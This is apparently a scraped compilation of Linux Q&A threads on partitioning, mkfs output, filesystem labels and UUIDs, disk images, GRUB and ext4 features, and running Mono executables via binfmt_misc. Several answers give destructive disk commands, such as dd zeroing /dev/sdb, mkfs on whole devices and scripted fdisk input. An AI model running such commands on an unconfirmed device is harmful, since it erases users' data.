Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytesDevice Start End Sectors Size Type
/dev/sdx1 2048 xxx xxx xxxx xx xxxxNotice how this SSD has 4 kB blocks, yet the numbers represent "sectors" of 512 byte.
As for the fstab settings, there once was a debate of explicitly requesting usage of the TRIM command. Current Linuxes are already pre-configured to operate in sensible manner (as discussed here).
Of course, copying the data with dd is much easier if the SSD is alt least as big as the HDD. If the SSD is smaller, I recommend gparted's copy and paste functions (you need to re-install the bootloader, tough).
|
I would like to move from an HD to an SSD. Is there anything special to consider here? For example:Different recommended fstab settings
mkfs or partition tools behaving differently when operating on an HD vs on an SSD -- so I'd end up with a file system optimized for an HD on my SSD. | Anything special to consider when cloning an HD to an SSD? |
You are trying to install Arch inside partition 7 of your SD card.
What you have done is to create two partitions inside that one partition. The fdisk utility has assumed that /dev/mmcblk0p7 is the SD Card (whereas it's actually just a partition on the SD Card) and derived the two partition names from it, /dev/mmcblk0p7p1 and /dev/mmcblk0p7p2. These won't exist so you can't reference them.
In case there's any confusion, the canonical name for your SD Card itself is /dev/mmcblk0.
|
I wanted to install Arch Linux on my Raspberry Pi 3 and I found an installation article that describes the process step by step. Now, I've run into a problem when I tried to create the vfat fs on the first partition:
My partition table:
Command (m for help): p
Disk /dev/mmcblk0p7: 28.4 GiB, 30438064128 bytes, 59449344 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x11a5fc51Device Boot Start End Sectors Size Id Type
/dev/mmcblk0p7p1 2048 206847 204800 100M c W95 FAT32 (LBA)
/dev/mmcblk0p7p2 206848 59449343 59242496 28.3G 83 Linux

but still:
root@raspberrypi:/home/pi# mkfs.vfat /dev/mmcblk0p7p1
mkfs.fat 4.1 (2017-01-24)
mkfs.vfat: unable to open /dev/mmcblk0p7p1: No such file or directory

Why is this, and how can I get around it?
| mkfs.vfat can't find the first partition on my disk |
Try umount -f /media/sdb1 or umount -l /media/sdb1.
If all else fails you can manually edit /etc/mtab to remove the offending mount entry.
|
I'm running Ubuntu 14.10 Server (headless).
I have a group of USB flashdrives that I need to reformat for use across several devices. I've successfully mounted, formatted, copied files to, and unmounted three devices. Upon mounting the forth the system believes that the first partition of this drive has already been mounted; it has never been inserted into the server before. I cannot mount or unmount the partition at all. At this point I'm assuming that this is my fault somewhere along the way but I can't get things back to normal.The Devices
The USB drives are to be formatted with two partitions and an empty 8MB header. The table is required as they will be used for specialized equipment. Each device is roughly 2GB in size
USB Partition table (to-be): [-EMPTY 8MB-|-- >1.1GB FAT 16--|--751MB FAT16--]The USB devices will have, at the very least, one pre-formatted partition of either Ext4 or Fat16.
The Situation
I've inserted a new USB device. Attempting to mount the device fails:
$ sudo mount sdb1
mount: can't find sdb1 in /etc/fstab
$ ls /media # Mounting a partition defaults to here
<empty>
$ pmount sdb1
Error: device /dev/sdb1 is already mounted to /media/sdb1
$ ls /media
<empty>df does not display /dev/sdb1 at all
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/sda2 944392620 35959148 860437980 5% /
none 4 0 4 0% /sys/fs/cgroup
udev 8183068 4 8183064 1% /dev
tmpfs 1638852 5640 1633212 1% /run
none 5120 0 5120 0% /run/lock
none 8194244 0 8194244 0% /run/shm
none 102400 4 102396 1% /run/user
/dev/sda1 523248 3436 519812 1% /boot/efifdisk displays the device correctly
Disk /dev/sdb: 1.9 GiB, 1993342976 bytes, 3893248 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x5651d77fDevice Boot Start End Sectors Size Id Type
/dev/sdb1 2048 2353151 2351104 1.1G 83 Linux
/dev/sdb2 2353152 3893247 1540096 752M 6 FAT16GParted will display the device correctly (size, partition(s), table, etc.) but shows that sdb1 is mounted. I can delete the partition, format to ext4, however I cannot format it to Fat16.
I can, however, mount sdb2 via pmount and view any files that exist. Unmounting, partitioning, and erasing it is always successful. If I insert additional devices (e.g. sdc) I can make any changes without issue. If I swap this device so that it is sdc instead of sdb I can still access it without any problems.
I'm assuming that I've goofed up and did not unmount properly sdb1 on a previous device which is causing this problem. I'm also assuming that mkfs.vfat is also experiencing issues because mkfs.ext3,mkfs.ext4 will run without errors.
Is there a way to recover from this problem? Would my (only) solution be to reboot the system? I'm hoping to avoid this because we have multiple data-fetching and data-hosting services up and running.Solution
Many thanks to steve for his simple solution. Of all my searches I did not happen to come across this.
If df, fdisk -l, umount -l, pumount do not work then you should check /etc/mtab next. This file had the following contents:
/dev/sda2 / ext4 rw,errors=remount-ro 0 0
proc /proc proc rw,nodev,noexec,nosuid 0 0
sysfs /sys sysfs rw,nodev,noexec,nosuid 0 0
none /sys/fs/cgroup tmpfs rw,uid=0,gid=0,mode=0755,size=1024 0 0
. . .
systemd /sys/fs/cgroup/systemd cgroup rw,nosuid,noexec,nodev,none,name=systemd 0 0
/dev/sdb1 /media/sdb1 ext4 rw,nodev,nosuid,noexec,errors=remount-ro,user 0 0That very last line was the source of the issue. Simply removing it fixed everything.
Please try using other guides/solutions before attempting this. I am not aware of any impact this could have on your system or device if other services are actively attempting to read/write/lock this partition.
| System claims my USB is mounted when I insert it and I cannot (un)mount it. How do I fix this? |
First, let us use the bytes notation to understand the concepts. Now, the actual size of the external HDD was 850GB which translates to 912680550400 bytes.
Block size and fragment size
The block size specifies the size that the file-system will use to read and write data. Here the default block size of 4096 bytes is used. The ext3 file system doesn't support block fragmentation so a one byte file will use a whole 4096 block. This can be modified by specifying the -f in the mkfs command but it is not suggested as the file systems today have enough capacity.
Total blocks possible = 912680550400/4096 = 222822400 blocks

So in our command output we have actually got 208234530 blocks, which is pretty close to our calculation; there will always be some blocks that cannot be used.
Total inodes in this example = 208234530/4 = 52058632.5 inodes

As per derobert's comment, the total inodes value is the number that mkfs is actually creating. inodes on ext2/3/4 are created at mkfs time. We can change how many it creates with several options (-i, -N), and different -T options do so implicitly.
It is always a heuristic and so the total inodes possible as per our command is 52060160 inodes.
Maximum file system size possible = 4294967296 * 4096 (block size)

So theoretically the file system size can be up to 16 TB; however, that is not quite true in practice.
The size of a block group is specified in sb.s_blocks_per_group blocks, though it can also be calculated as 8 * block_size_in_bytes. So the total number of block groups could be:
total block groups = 208234530/32768 = 6354.81 So it is close to 6355 groups as per our command output.
Total inodes per group = 32768/4 = 8192 inodes

References
http://www.redhat.com/archives/ext3-users/2004-December/msg00001.html
https://ext4.wiki.kernel.org/index.php/Ext4_Disk_Layout
https://serverfault.com/a/117598
What is a fragment size in an ext3 filesystem?
|
I was creating a new file system in my external HDD. While formatting, I had to format this partition to the remaining available partition which is somewhere around 850GB. Now, I created an ext3 file system in this partition. This is the output of my mkfs.ext3 command.
mkfs.ext3 /dev/sdb3
mke2fs 1.41.3 (12-Oct-2008)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
52060160 inodes, 208234530 blocks
10411726 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4294967296
6355 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000, 7962624, 11239424, 20480000, 23887872, 71663616, 78675968,
102400000Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done

Can someone help me interpret this output? I am not clear on what these values actually represent.
| debug mkfs.ext3 command output |
No and yes.
The command to create the filesystem is the one that generates the UUID. So, before running it there is no UUID to use to name the filesystem.
However, it is possible to use a specific UUID to create the filesystem:
$ uuid=$(uuidgen)
$ echo "$uuid"
9a7d78e5-bc6c-4b19-94da-291122af9cf5
$ mkfs.ext4 -U "$uuid" The uuidgen program which is part of the e2fsprogs package
|
is it possible to capture the UUID number before creating file system on disk?
if yes how - by which command ?
blkid ( before run mkfs.ext4 on sdb disk )<no output>blkid ( after run mkfs.ext4 on sdb disk )/dev/sdb: UUID="9bb52cfa-0070-4824-987f-23dd63efe120" TYPE="ext4"Goal - we want to capture the UUID number on the Linux machines disks before creation the file system
| is it possible to capture the UUID number before creating file system on disk |
Typically a device /dev/sdb contains a partition table, not a filesystem. It's each individual partition that would contain a filesystem. However, since your example uses /dev/sdb itself I'll also use that here.
Using your own tune2fs command and looking at the output:
tune2fs -l /dev/sdb

it's possible to see by inspection that there is a creation date. For example,
Filesystem created: Fri Jul 1 13:11:44 2016 |
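So, for example, filtering for that line directly (the grep for "time" in the question missed it because the field is called "created"):

tune2fs -l /dev/sdb | grep -i 'created'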
is it possible to understand , when filesystem was created on disk ( date and time )
we try the following ( on sdb disk )
tune2fs -l /dev/sdb | grep time
Last mount time: Mon Aug 1 19:17:48 2022
Last write time: Mon Aug 1 19:17:48 2022
but we get only the last mount and last write times
what we need is when the filesystem was created by the mkfs command
from lsblk -f we get:
lsblk -f | grep sdb
sdb ext4 cc0f5da9-6bbc-42ff-8f5a-847497fd993e /data/sdb
so what we actually need is when mkfs was run ( date & time )
| linux + is it possible to understand when filesystem was created on disk |
The labels shown by lsblk (or rather, blkid) in its LABEL column are the file system labels, which are only available on file systems capable of storing a label. A block device with no file system can’t have such a label.
GPT partitions can also be labeled, and lsblk shows that with PARTLABEL. But that’s not an option for whole disks either.
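If you did put a GPT partition table on the disk, a hedged sketch of naming a partition (sgdisk's -c option changes the GPT partition name, which lsblk reports as PARTLABEL; the partition number and name here are examples):
sgdisk -c 1:disk2 /dev/sde
lsblk -o NAME,PARTLABEL /dev/sde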
|
we have a RHEL 7.2 server; the server is a VM
and we added a new disk - sde
with the following example we create an ext4 file system with the label disk2
mkfs.ext4 -L disk2 /dev/sde
mke2fs 1.42.9 (28-Dec-2013)
/dev/sde is entire device, not just one partition!
Proceed anyway? (y,n) y
Discarding device blocks: done
Filesystem label=disk2
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
262144 inodes, 1048576 blocks
52428 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=1073741824
32 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736
Allocating group tables: done
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done
so we get
lsblk -o +FSTYPE,LABEL | grep sde
sde 8:64 0 4G 0 disk ext4 disk2
is it possible to create only the label on the new disk, without creating a file system?
example of expected output ( without file system on disk )
lsblk -o +FSTYPE,LABEL | grep sde
sde 8:64 0 4G 0 disk disk2 | how to create disk label without creation filesystem on new disk |
See the parse_fs_type function in mke2fs.c:
if a file system type is specified explicitly (using -t), use that;
if the tool is running on the Hurd, use “ext2”;
if the program name is mke3fs, use “ext3”;
if the program name is mke4fs, use “ext4”;
if the program name starts with mkfs., use the suffix;
otherwise, use the default defined in /etc/mke2fs.conf, if any;
otherwise, use “ext2”, unless a journal is enabled by default, in which case use “ext3”.
The resulting text string is used to find a file system definition in /etc/mke2fs.conf (apart from “ext2” which is handled internally).
So your mkmk would end up using the ext2 file system type.
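A quick way to see this name-based dispatch in action (illustrative only; the image file names and size are arbitrary, and mke2fs may ask for confirmation when run against a plain file):
truncate -s 100M /tmp/a.img /tmp/b.img
ln -s /sbin/mke2fs /tmp/mkfs.ext4
ln -s /sbin/mke2fs /tmp/mkmk
/tmp/mkfs.ext4 /tmp/a.img   # picks up the ext4 definition from /etc/mke2fs.conf
/tmp/mkmk /tmp/b.img        # no recognised name, so it falls back to the default (ext2)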
|
Considering the output from the ls command:
$ ls -l /sbin/mkfs.ext4
lrwxrwxrwx 1 root root 6 Aug 4 00:10 /sbin/mkfs.ext4 -> mke2fs
$ type mkfs.ext4
mkfs.ext4 is hashed (/sbin/mkfs.ext4)
mkfs.ext4 is a symlink pointing to the mke2fs command. Nothing strange, all good and fine. Therefore, running mkfs.ext4 is the same as running mke2fs. Notice the curly brackets that I've added in the output of the commands below:
$ mke2fs
Usage: {mke2fs} [-c|-l filename] [-b block-size] [-C cluster-size]
--snip--
$ mkfs.ext4
Usage: {mkfs.ext4} [-c|-l filename] [-b block-size] [-C cluster-size]
--snip--
$ ln -s /sbin/mke2fs mkmk
$ ls -l mkmk
lrwxrwxrwx 1 direprobs direprobs 12 Aug 8 14:25 mkmk -> /sbin/mke2fs
$ ./mkmk
Usage: mkmk [-c|-l filename] [-b block-size] [-C cluster-size]
--snip--
I managed to make an ext2 filesystem using mkmk, the symlink which I've made with ln. But what does mkmk mean to mke2fs? It should mean nothing!
How does mke2fs use filenames from which it's run to determine the filesystem type to make?
| /sbin/mkfs.fs acts like a binary file even though it's a symbolic link file |
If you're creating a disk image, you need to operate on a file, not on a directory:
# Create a file of some specific size for the new image
truncate -s 10g disk.img
# Format the image with a new filesystem
mkfs -t ext4 disk.img
You can mount the image using the loop mount option:
mount -o loop disk.img /mnt
Note that the above instructions are for creating a filesystem image. If you want to create a bootable image, you will probably want to partition the file, install a bootloader, etc., which is a slightly more involved process.
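For the partitioned case, a hedged sketch (the layout and sizes are only examples; losetup -P asks the kernel to expose the image's partitions as ${loop}p1, ${loop}p2, and so on):
truncate -s 10g disk.img
parted -s disk.img mklabel msdos mkpart primary ext4 1MiB 100%
loop=$(sudo losetup -fP --show disk.img)   # attach the image and print the loop device
sudo mkfs -t ext4 "${loop}p1"
sudo mount "${loop}p1" /mnt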
|
I know I used to be able to do it, and its frustrating I cant recall.
I want to write an ext4 filesystem to a disk image in a folder. I don't want to re-partition my drive, I just need the filesystem to build an OS in.
I tried $mkdir foo then sudo mkfs.ext4 foo 70000
mke2fs 1.45.5 (07-Jan-2020) warning: Unable to get device geometry for foo foo: Is a directory while setting up superblock
so I think I'm missing arguments. I tried reading the man page, and the ol' Google, but I did not see an example of using mkfs.ext4 to create a new disk image.
| how do I make a new filesystem image? |
It should not take that long for a single run unless you let it zero the partition and check for bad sectors (which is the default, at least in my version). It is a good idea to check for bad sectors, but you can skip that with the -f (quick format) option:
sudo mkfs.ntfs -f /dev/zd16 -c 8192 |
On my machine mkfs.ntfs is slow and results in massive use of resources, preventing me from using the machine for anything else. According to top it (or rather directly related zvol processes) is using 80-90% of every thread available, even threads that were already in use by other processes (such as virtual machines).
Is this massive resource use by mkfs.ntfs normal? And if so, is there any way to limit the number of threads that mkfs.ntfs uses? I am thinking that if I could limit it to just a few threads/cores, then other processes would have resources so that I can keep working.
Edit with additional info.
I am using Ubuntu 20.04 as my host OS, and the volume I am formatting is a ZFS zvol. This zvol shares a mirrored VDEV with an ext4 partition, off of which I run Kubuntu.
To make the zvol I ran
sudo zfs create -V 400G -o compression=lz4 -o volblocksize=8k -s nvme-tank/ntfs-zvol
After the suggestions in the comments, I tried using nice to de-prioritize the command. It helped a little, but still caused extreme lagginess in the VM I was using.
nice -n19 sudo mkfs.ntfs /dev/zd16 -c 8192
And this is top (screenshot). The zvol processes only occur during the mkfs command, so I assume they are directly related.
Well, thanks @krowe. I'm on a laptop so I can't really use different hard drives. And this particular case was due to misleading information during the installation of Mint 17.
Anyway, I have found a way to recover all the files I need and will describe here what it was all about.
So first I booted a live Linux USB and started working from it, so as not to write any data to the 900 GB partition. Then I got this nice tool testdisk, ran it with the deeper search and got back all the partition information I had lost. From there I started recovering all the files to an external HD.
For support on how to use testdisk - http://forum.cgsecurity.org/phpBB3/
Thanks all for the support.
|
I just installed Linux Mint 17 and when it asked me where to install it I selected the option to overwrite the old Mint 14. Previously I also had Windows with an NTFS partition of 900 GB. Now it is all formatted as ext4 and almost 800 GB of information is lost.
Please advise what I can do in this situation. It was a light format, so there should be a way to recover some of the info I have lost. Is it a good idea to format back to NTFS and try some recovery programs or something like the Hiren's BootCD?
| How to recover NTFS drive formatted in ext4? |
GRUB2 doesn't currently support the inline_data ext4 feature.
I can't say for sure whether you can disable it at runtime using tune2fs (on an unmounted partition) but you could try.
|
As the title states, grub is unable to recognise my ext4 partition:
GNU GRUB version 2.06-3~deb11u5 Minimal BASH-like line editing is supported. For the first word, TAB
lists possible command completions. Anywhere else TAB lists possible
device or file completions.
grub> ls (hd0
Possible partitions are:
Device hd0: No known filesystem detected - Sector size 512B - Total size
2097152KiB
Partition hd0,gpt1: No known filesystem detected - Partition start at
131072KiB - Total size 1966063.5KiB
...
The disk is using GPT partitioning scheme and the bootloader is the default EFI GRUB2 (grub-efi-amd64-signed) shipped with Debian 11. The partition contains a Linux installation cloned from another disk with rsync -ahPHAXx (as suggested here) (however GRUB doesn't recognise it even when the partition is empty).
On another Linux installation, I am able to mount and browse the above mentioned filesystem and no errors are reported by e2fsck either:
/dev/sdb1: clean, 25991/122880 files, 176823/491515 blocks
This ext4 partition has been formatted using the following command:
sudo mkfs.ext4 -v -o 'Linux' -O '^has_journal,resize_inode,^filetype,^64bit,sparse_super2,^huge_file,extra_isize,inline_data' -E 'resize=8388608,root_owner=0:0' -M '/' /dev/sdXYThis issue first occurred on a virtual machine. However, I tried to replicate the same setup on a physical machine by creating a partition of the same size on an existing GPT disk and formatting it with the same options, and trying to ls the disk with different versions of EFI GRUB2 shipped with different distros (CentOS, openSUSE etc.) but always got the same issue (No known filesystem detected).
Can someone point out which of the specified options passed to mkfs is causing the partition not to be recognised by GRUB, but causing no issues in mounting and using on a booted Linux?
| grub does not recognise specially-formatted ext4 partition |
You can't mkdir on a partition.
You need to format it (that's not the same as assigning a partition type) and mount it first.
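A hedged sketch, assuming /dev/sda4 from the question really is the partition you want to use (double-check with lsblk first - mkfs destroys whatever is on it):
sudo mkfs.ext4 /dev/sda4          # put a filesystem on the partition
sudo mkdir -p /mnt/stick          # a mount point on the running system
sudo mount /dev/sda4 /mnt/stick
sudo mkdir /mnt/stick/somedir     # now mkdir works inside the mounted filesystem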
|
size: 58 GB
contents: unknown
device: /dev/sda4
partition type: basic data
When I ran the format, I selected the type which I expected would result in a partition type of Linux.
I found a similar issue from 2019, but fdisk wouldn't run the solution.
The file type may be suitable, but I haven't been able to run 'mkdir' on the partition.
'Files' doesn't see the partition under "Other Locations".
Suggestions welcome.
| /dev/sda4/ on USB stick isn't available after formatting. 'Discs' shows the following: |
Here-document syntax allows you to use fdisk non-interactively:
fdisk /dev/sdb <<EOF
n
p



t
b
p
q
EOF
Because this is just an example, I used p and q so no changes are written. Use w after your verified sequence.
Note that a blank line corresponds to a sole Enter. The point is that you can pass your keystrokes this way.
Alternatively you can write those lines (between two EOF-s) to a file, say fdisk.commands, and then:
fdisk /dev/sdb < fdisk.commands
Or without a file (from a comment, thank you Rastapopoulos):
fdisk /dev/sdb <<< $'n\np\n\n\n\nt\nb\np\nq'
Another way:
printf '%s\n' "n" "p" "" "" "" "t" "b" "p" "q" | fdisk /dev/sdb
There's also sfdisk. You may find its syntax more suitable for you.
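For completeness, a hedged sfdisk sketch (sfdisk reads a declarative description of the partition table from stdin; this one creates a single partition of type c, W95 FAT32 LBA, spanning the whole device):
echo 'type=c' | sfdisk /dev/sdb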
|
I'm using this to wipe a USB flash drive and recreate a FAT filesystem:
dd if=/dev/zero of=/dev/sdb bs=1M #I don't need more advanced wiping
fdisk /dev/sdb
(a few keystrokes to select partition type, etc.)
mkfs.fat /dev/sdb1
The fact that I have to manually do a few keystrokes is annoying. How could I do all of this in one step, without any intervention? Something like:
dd if=/dev/zero of=/dev/sdb bs=1M && ??? &&& mkfs.fat /dev/sdb1 | Wipe a USB flash drive and recreate a filesystem |
This is binfmt_misc in action: it allows the kernel to be told how to run binaries it doesn't know about. Look at the contents of /proc/sys/fs/binfmt_misc; among the files you see there, one should explain how to run Mono binaries:
enabled
interpreter /usr/lib/binfmt-support/run-detectors
flags:
offset 0
magic 4d5a
(on a Debian system). This tells the kernel that binaries starting with MZ (4d5a) should be given to run-detectors. The latter figures out whether to use Mono or Wine to run the binary.
Binary types can be added, removed, enabled and disabled at any time; see the documentation above for details (the semantics are surprising, the virtual filesystem used here doesn't behave entirely like a standard filesystem). /proc/sys/fs/binfmt_misc/status gives the global status, and each binary "descriptor" shows its individual status. Another way of disabling binfmt_misc is to unload its kernel module, if it's built as a module; this also means it's possible to blacklist it to avoid it entirely.
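As a hedged illustration of the registration interface (this mirrors the Mono example from the kernel's binfmt_misc documentation; the entry name is arbitrary and writing to these files requires root):
# format is :name:type:offset:magic:mask:interpreter:flags
echo ':CLR:M::MZ::/usr/bin/mono:' > /proc/sys/fs/binfmt_misc/register
echo 0  > /proc/sys/fs/binfmt_misc/CLR    # disable the entry
echo -1 > /proc/sys/fs/binfmt_misc/CLR    # remove it again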
This feature allows new binary types to be supported, such as MZ executables (which include Windows PE and PE+ binaries, but also DOS and OS/2 binaries!), Java JAR files... It also allows known binary types to be supported on new architectures, typically using Qemu; thus, with the appropriate libraries, you can transparently run ARM Linux binaries on an Intel processor!
Your question stemmed from cross-compilation, albeit in the .NET sense, and that brings up a caveat with binfmt_misc: some configuration scripts misbehave when you try to cross-compile on a system which can run the cross-compiled binaries. Typically, detecting cross-compilation involves building a binary and attempting to run it; if it runs, you're not cross-compiling, if it doesn't, you are (or your compiler's broken). autoconf scripts can usually be fixed in this case by explicitly specifying the build and host architectures, but sometimes you'll have to disable binfmt_misc temporarily...
|
I'm learning C#, so I made a little C# program that says Hello, World!, then compiled it with mono-csc and ran it with mono:
$ mono-csc Hello.cs
$ mono Hello.exe
Hello, World!
I noticed that when I hit TAB in bash, Hello.exe was marked executable. Indeed, it runs by just a shell loading the filename!
Hello.exe is not an ELF file with a funny file extension:
$ readelf -a Hello.exe
readelf: Error: Not an ELF file - it has the wrong magic bytes at the start
$ xxd Hello.exe | head -n1
00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000 MZ..............
MZ means it's a Microsoft Windows statically linked executable. Drop it onto a Windows box, and it will (should) run.
I have wine installed, but wine, being a compatibility layer for Windows apps, takes about 5x as long to run Hello.exe as mono or direct execution does, so it's not wine that runs it.
I'm assuming there's some mono kernel module installed with mono that intercepts the exec syscall/s, or catches binaries that begin with 4D 5A, but lsmod | grep mono and friends return an error.
What's going on here, and how does the kernel know that this executable is special?
Just for proof it's not my shell working magic, I used the Crap Shell (aka sh) to run it and it still runs natively.
Here's the program in full, since a commenter was curious:
using System;

class Hello {
    /// <summary>
    /// The main entry point for the application
    /// </summary>
    [STAThread]
    public static void Main(string[] args) {
        System.Console.Write("Hello, World!\n");
    }
}
If you're really Qt gung-ho and just can't stand any gtk+ stuff on your desktop, you might be out of luck. If you are, on the other hand, not a library purist, may I suggest MonoDevelop?
MonoDevelop is an IDE primarily designed for C# and other .NET languages. MonoDevelop enables developers to quickly write desktop and ASP.NET Web applications on Linux, Windows and Mac OSX. MonoDevelop makes it easy for developers to port .NET applications created with Visual Studio to Linux and to maintain a single code base for all platforms.
Of course, you can also write along using Emacs or Vim without any real problems.
|
Currently I don't have a Linux installation with a GUI. All are running text mode. When I do, I usually use KDE. On Windows I am a .NET developer and I haven't done any Mono development, yet. I heard that Monodevelop is only for GNOME.
If you develop Mono on a KDE environment, what IDE do you use?
| What IDE do you use for Mono development on KDE? |
So you're looking for a package containing a file called System.Windows.Forms.dll. You can search:
on your machine: apt-file search System.Windows.Forms.dll (the apt-file package must be installed)
online: at packages.ubuntu.com.
Both methods lead you to (as of Ubuntu 14.04):
libmono-system-windows-forms4.0-cil and
libmono-winforms2.0-cil.
Install it with:
sudo apt-get install libmono-system-windows-forms4.0-cil |
I haven't found any concise explanation of this.
| How do I install mono's System.Windows.Forms on Ubuntu? |
When testing Mono/Linux vs .NET/Windows workloads, you have to remember that there is more at play than just the runtime environment.
There are areas in which Linux performs better than Windows (Most IO and network operations tend to be faster for comparable C programs). At the same time, .NET has a more advanced garbage collector and a more advanced JIT compiler.
When it comes to the class libraries, it really depends on what code paths you are using. As JacksonH said on a previous post, you can hit code paths that have been optimized in one implementation, but not on the other, and viceversa.
On ASP.NET workloads you have to remember that the default setup will route all incoming requests to a single "worker" process; mod_mono and Cherokee use a similar approach (source: mono-project.com).
At least with Apache we support a mechanism where you can divide application workloads across multiple workers, which helps under high loads as it avoids any in-process locking and gives each worker a whole thread pool to work from (source: mono-project.com).
The details on how to configure this setup are available here:
http://mono-project.com/Mod_mono
|
I am setting up a development server and want to set it up to serve ASP.NET pages using Mono. I am planning on using Cherokee and Mono (http://www.cherokee-project.com/doc/cookbook_mono.html) and wondered if anyone had done any performance testing comparing the Unix based stack to the Windows based.
| Has anyone got any performance numbers comparing IIS and .NET to Cherokee and Mono? |
Bash has no such feature. Zsh does, you can set up aliases based on extensions:
alias -s exe=monoThis would only work in an interactive shell, however, not when a program invokes another.
Under Linux, you can set up execution of foreign binaries through the binfmt_misc mechanism; see Rolf Bjarne Kvinge. Good Linux distributions set this up automatically as part of the mono runtime package.
If you can't use binfmt_misc because you don't have root permissions, you'll have to settle for wrapper scripts.
#!/bin/sh
exec /path/to/mono "$0.exe" "$@"
Put the wrapper script in the same directory as the .exe file, with the same name without .exe.
|
Without any DE or even X, I want to use ./my.exe to run mono my.exe, like it works with python scripts.
| How to set bash to run *.exe with mono? |
From the What's New In PowerShell Core 6.0 documentation, in the "Backwards Compatibility" section:
Most of the modules that ship as part of Windows (for example,
DnsClient, Hyper-V, NetTCPIP, Storage, etc.) and other Microsoft
products including Azure and Office have not been explicitly ported to
.NET Core yet. The PowerShell team is working with these product
groups and teams to validate and port their existing modules to
PowerShell Core. With .NET Standard and CDXML, many of these
traditional Windows PowerShell modules do seem to work in PowerShell
Core, but they have not been formally validated, and they are not
formally supported.
While Powershell Core is GA, it is still very much a work in progress.
|
Why is Resolve-DnsName not recognized for PowerShell Core? So far as I recall it works fine with PowerShell itself.
Is this a .NET versus dotnet problem? That dotnet simply doesn't have this functionality?
thufir@dur:~/powershell/webservicex$
thufir@dur:~/powershell/webservicex$ dotnet --version
2.1.4
thufir@dur:~/powershell/webservicex$
thufir@dur:~/powershell/webservicex$ ./dns.ps1
Resolve-DnsName : The term 'Resolve-DnsName' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At /home/thufir/powershell/webservicex/dns.ps1:3 char:1
+ Resolve-DnsName -Name localhost -Type ANY | Format-Table -AutoSize
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Resolve-DnsName:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundExceptionthufir@dur:~/powershell/webservicex$
thufir@dur:~/powershell/webservicex$ cat dns.ps1
#!/usr/bin/pwsh -Command
Resolve-DnsName -Name localhost -Type ANY | Format-Table -AutoSize
thufir@dur:~/powershell/webservicex$
see closed question also, and technet.
| Resolve-DnsName : The term 'Resolve-DnsName' is not recognized as the name of a cmdlet |
Mono does not support AIX.
If you want to try to port Mono to AIX, you would probably want to:Turn on the manual checking of dereferences in Mono, as AIX keeps the page at address zero mapped, preventing a whole class of errors from being caught. I forget the name of the define, but it was introduced some six months ago.
You would have to make sure that your signal handlers work, and that exception unwinding works on your platform.
The rest is probably replacing a few Posix functions with some AIX equivalents, but if you get the two above working, you would likely have a working Mono installation. But neither one of those tasks is easy.
|
I don't have root access to an AIX 5.2 machine and want to run Mono programs on it.
| How to install Mono in AIX? |
You have three options:
1) Emulation (Wine, Crossover Linux, Bordeaux)
2) Virtualization (VMware Player or VMware Workstation, Parallels Desktop, Oracle Virtualbox)
3) Dual Boot
For C# development on Linux, Mono Project is the way to go. You can develop in MonoDevelop IDE and connect to SQL Server hosted in a virtual machine using SQL Client (for more info see: Mono/ADO.NET, Mono/ODBC, Mono/Database Access)
For more information about Mono have a look at the Start page: http://mono-project.com/Start and Mono FAQ Technical, Mono FAQ General, Mono ASP.NET FAQ, Mono WinForms FAQ, Mono Security FAQ
Also see their Plans and Roadmap
Thanks to the Mono project you can even build apps with C# for Apple devices using Monotouch or for Android using Monodroid.
Also if you want to have the latest version of Mono and tools I recommend using openSUSE because thats the first place where you'll find the latest updates, Mono being a project backed by Novell which is the company that also sponsors openSUSE distribution.
EDIT: (Completing the Office part of the question)
// Office suites //
1) IBM Lotus Symphony -> http://symphony.lotus.com/software/lotus/symphony/home.nsf/home
2) Oracle OpenOffice -> http://www.oracle.com/us/products/applications/open-office/index.html
3) OpenOffice.org -> http://www.openoffice.org/
4) GNOME Office -> http://live.gnome.org/GnomeOffice
5) Go-oo.org -> http://go-oo.org/
6) SoftMaker Office -> http://www.softmaker.com/english/ofl_en.htm
7) KOffice -> http://www.koffice.org/
// Online Office suites //
0) Microsoft Office Online -> http://www.officelive.com/en-us/
1) Google Apps -> http://docs.google.com/
2) Zoho -> http://www.zoho.com/
3) ThinkFree -> http://thinkfree.com
4) Live-Documents -> http://www.live-documents.com/
5) Ajax13 -> http://us.ajax13.com/en/
6) ContactOffice -> http://www.contactoffice.com/
7) FengOffice -> http://www.fengoffice.com/web/
8) Zimbra -> http://www.zimbra.com/
|
I want to start working with Linux, and I know I should work in it regularly to improve myself.
I work with SQL Server, Office, and C# at the company. Can I install them and do my tasks in Linux (i.e. Red Hat)?
| Can I work with Sql Server, Office and C# using Linux? |
MonoDevelop 4.2.2 supports Visual Studio 2013 solutions normally, but you will need to change the ToolsVersion in your projects. Open each project's .csproj file in a text editor and change ToolsVersion="12.0" to ToolsVersion="4.0".
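If there are many projects, a hedged one-liner to do that edit in bulk (run from the solution directory; back up or commit first):
find . -name '*.csproj' -exec sed -i 's/ToolsVersion="12.0"/ToolsVersion="4.0"/' {} +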
|
My Toshiba Laptop had started running slow recently and, quite frankly, I was tired of Windows 8, so I created a USB of the most recent version of Linux Mint and installed it, moving all my needed projects to GitHub.
